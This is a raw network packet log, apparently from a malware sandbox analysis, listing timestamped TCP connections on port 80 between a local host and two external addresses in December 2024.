                                                                                                                                                                                                Dec 13, 2024 08:21:03.033948898 CET5009180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:03.149445057 CET8050092185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:03.149662971 CET5009280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:03.149763107 CET8050088185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:03.150091887 CET5008880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:03.153700113 CET8050091185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:03.155030966 CET5009280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:03.201984882 CET5008980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:03.202390909 CET5009380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:03.274717093 CET8050092185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:03.322220087 CET8050093185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:03.322238922 CET8050089185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:03.322469950 CET5008980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:03.322469950 CET5009380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:03.329755068 CET5009380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:03.449556112 CET8050093185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:04.503602028 CET8050092185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:04.503681898 CET5009280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:04.525738955 CET8050091185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:04.525777102 CET8050091185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:04.525906086 CET5009180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:04.527235985 CET5009180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:04.637476921 CET5009480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:04.647476912 CET8050091185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:04.674779892 CET8050093185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:04.674912930 CET5009380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:04.760620117 CET8050094185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:04.760731936 CET5009480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:04.760838032 CET5009480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:04.883893013 CET8050094185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:04.883956909 CET5009480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:05.003930092 CET8050094185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.055206060 CET5009280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:06.055562019 CET5009580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:06.175328016 CET8050095185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.175431967 CET5009580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:06.175555944 CET8050092185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.175610065 CET5009280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:06.190773010 CET5009580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:06.233576059 CET5009380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.233885050 CET5009680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.310543060 CET8050095185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.354645967 CET8050093185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.354660988 CET8050096185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.354700089 CET5009380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.354743958 CET5009680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.369031906 CET8050094185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.369160891 CET8050094185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.369231939 CET5009480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.370501995 CET5009480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.381831884 CET5009680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.481270075 CET5009780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.490155935 CET8050094185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.502994061 CET8050096185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.601207972 CET8050097185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.603945017 CET5009780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.604017019 CET5009780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.723819017 CET8050097185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:06.729007006 CET5009780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:06.848839045 CET8050097185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:07.534276009 CET8050095185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:07.535897017 CET5009580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:07.722229004 CET8050096185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:07.722419024 CET5009680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:08.069358110 CET8050097185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:08.069403887 CET8050097185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:08.069482088 CET5009780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:08.070785046 CET5009780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:08.184871912 CET5009880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:08.190944910 CET8050097185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:08.305124998 CET8050098185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:08.305224895 CET5009880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:08.305303097 CET5009880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:08.424968958 CET8050098185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:08.425048113 CET5009880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:08.544722080 CET8050098185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.224337101 CET5009580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:09.224853039 CET5009980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:09.344719887 CET8050099185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.344747066 CET8050095185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.344841957 CET5009980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:09.344875097 CET5009580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:09.362879038 CET5009980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:09.380626917 CET5009680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:09.380918980 CET5010080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:09.482620001 CET8050099185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.500811100 CET8050100185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.500905991 CET8050096185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.500921965 CET5010080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:09.500962973 CET5009680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:09.510809898 CET5010080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:09.633891106 CET8050100185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.905309916 CET8050098185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.905378103 CET8050098185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:09.905452967 CET5009880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:09.915420055 CET5009880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:10.028604031 CET5010180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:10.035367012 CET8050098185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:10.148521900 CET8050101185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:10.148709059 CET5010180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:10.161757946 CET5010180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:10.281548023 CET8050101185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:10.281728029 CET5010180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:10.401489019 CET8050101185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:10.691335917 CET8050099185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:10.691565037 CET5009980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:10.846005917 CET8050100185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:10.846082926 CET5010080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:11.756026983 CET8050101185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:11.756078959 CET8050101185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:11.756218910 CET5010180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:11.757637978 CET5010180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:11.871860981 CET5010280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:11.877527952 CET8050101185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:11.991877079 CET8050102185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:11.991961002 CET5010280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:11.992013931 CET5010280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:12.112531900 CET8050102185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:12.112685919 CET5010280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:12.232637882 CET8050102185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:12.243174076 CET5009980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:12.243495941 CET5010380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:12.363269091 CET8050103185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:12.363373995 CET8050099185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:12.363393068 CET5010380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:12.363485098 CET5009980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:12.404058933 CET5010380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:12.456952095 CET5010080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:12.457252026 CET5010480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:12.523857117 CET8050103185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:12.577899933 CET8050104185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:12.578161001 CET5010480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:12.578217983 CET8050100185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:12.578284025 CET5010080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:12.589831114 CET5010480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:12.709745884 CET8050104185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.452770948 CET8050102185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.452816010 CET8050102185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.452912092 CET5010280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:13.474078894 CET5010280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:13.575553894 CET5010580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:13.593936920 CET8050102185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.695637941 CET8050105185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.695801973 CET5010580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:13.695801973 CET5010580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:13.721525908 CET8050103185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.721615076 CET5010380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:13.815753937 CET8050105185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.815845013 CET5010580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:13.935756922 CET8050105185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.940124989 CET8050104185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:13.940184116 CET5010480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.210714102 CET8050105185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.210886002 CET8050105185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.211005926 CET5010580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.212205887 CET5010580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.325114965 CET5010680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.331922054 CET8050105185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.444982052 CET8050106185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.445102930 CET5010680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.445481062 CET5010680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.476840973 CET5010380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:15.477153063 CET5010780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:15.565176964 CET8050106185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.565365076 CET5010680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.597062111 CET8050107185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.597127914 CET8050103185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.597261906 CET5010780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:15.597276926 CET5010380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:15.618622065 CET5010780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:15.685286999 CET8050106185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.691158056 CET5010480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.691406012 CET5010880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.738564014 CET8050107185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.811364889 CET8050108185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.811532974 CET5010880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:15.811889887 CET8050104185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:15.811950922 CET5010480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:16.005428076 CET5010880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:16.125499964 CET8050108185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:16.921998978 CET8050106185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:16.922064066 CET8050106185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:16.922362089 CET5010680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:16.923980951 CET5010680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:16.939085960 CET8050107185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:16.939173937 CET5010780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:17.028172970 CET5010980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:17.043641090 CET8050106185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:17.144870043 CET8050108185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:17.144938946 CET5010880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:17.147893906 CET8050109185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:17.148005009 CET5010980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:17.148087025 CET5010980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:17.267864943 CET8050109185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:17.268022060 CET5010980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:17.387820959 CET8050109185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:18.535721064 CET5010780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:18.536093950 CET5011080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:18.605263948 CET8050109185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:18.605309963 CET8050109185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:18.605360031 CET5010980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:18.631954908 CET5010980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:18.655930996 CET8050110185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:18.655968904 CET8050107185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:18.656028032 CET5011080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:18.656052113 CET5010780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:18.751871109 CET8050109185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:18.759808064 CET5011180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:18.879585981 CET8050111185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:18.879766941 CET5011180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:18.883739948 CET5011180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:19.003526926 CET8050111185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:19.003609896 CET5011180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:19.123660088 CET8050111185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:19.222071886 CET5011080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:19.222215891 CET5010880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:19.223031044 CET5011280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:19.342062950 CET8050110185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:19.342320919 CET8050108185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:19.342381954 CET5010880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:19.342813969 CET8050112185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:19.343342066 CET5011280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:19.345832109 CET5011280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:19.465635061 CET8050112185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:20.018685102 CET8050110185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:20.018768072 CET5011080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:20.321099043 CET8050111185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:20.321130991 CET8050111185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:20.321178913 CET5011180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:20.322639942 CET5011180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:20.434776068 CET5011380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:20.442461967 CET8050111185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:20.554763079 CET8050113185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:20.554873943 CET5011380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:20.554953098 CET5011380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:20.674851894 CET8050113185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:20.674956083 CET5011380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:20.705713987 CET8050112185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:20.705869913 CET5011280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:20.794888973 CET8050113185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.153484106 CET8050113185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.153543949 CET8050113185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.153611898 CET5011380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.160620928 CET5011380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.205348969 CET5011080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:22.205641985 CET5011480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:22.262526989 CET5011580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.280359030 CET8050113185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.325473070 CET8050114185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.325530052 CET8050110185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.325546026 CET5011480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:22.325608015 CET5011080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:22.335344076 CET5011480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:22.375255108 CET5011280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.375590086 CET5011680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.382297039 CET8050115185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.382402897 CET5011580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.382510900 CET5011580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.455138922 CET8050114185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.495435953 CET8050116185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.495544910 CET5011680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.495548964 CET8050112185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.495596886 CET5011280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.501132965 CET5011680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.502289057 CET8050115185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.502351046 CET5011580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:22.620958090 CET8050116185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:22.622114897 CET8050115185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:23.663537979 CET8050114185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:23.663628101 CET5011480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:23.830214024 CET8050116185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:23.830302954 CET5011680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:23.837435007 CET8050115185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:23.837543011 CET8050115185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:23.837613106 CET5011580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:23.838947058 CET5011580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:23.950390100 CET5011780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:23.958686113 CET8050115185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:24.070331097 CET8050117185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:24.070486069 CET5011780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:24.070517063 CET5011780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:24.190515995 CET8050117185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:24.190712929 CET5011780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:24.311042070 CET8050117185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.224853992 CET5011480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:25.225249052 CET5011880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:25.345149994 CET8050118185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.345176935 CET8050114185.81.68.148192.168.2.11
